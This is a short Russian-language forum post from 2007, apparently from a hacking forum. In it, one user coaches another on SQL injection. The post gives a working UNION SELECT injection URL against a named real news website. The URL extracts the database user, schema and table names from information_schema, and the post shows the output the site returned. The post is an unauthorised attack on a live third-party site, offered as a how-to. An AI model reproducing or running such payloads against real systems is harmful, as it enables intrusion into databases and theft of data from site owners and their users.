06.11.2007, 16:48
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
fRg, вот смотри - при инъекции иногда полезно бывает просматривать поле table_schema, чтобы видеть в какой схеме находится интересующая нас таблица, иначе, как в твоём случае, есть шанс, что текущему пользователю не хватит прав на доступ к ней. Вот пример:
http://www.weltexpress.info/index.php?artikel_id=64444&lan=ru&rubrik=-1+union+select+concat_ws(0x3a,user(),table_schema, table_name)+from+information_schema.tables+limit+3 4,1/*
Он выводит:
WELTEXPRESS@LOCALHOST:PHILBERL-1:WISSENSCHAFT_KALASCHNIKOW
Легко убедиться, что наш юзер это WELTEXPRESS, а таблица WISSENSCHAFT_KALASCHNIKOW находится в схеме пользователя PHILBERL-1.
|
|
|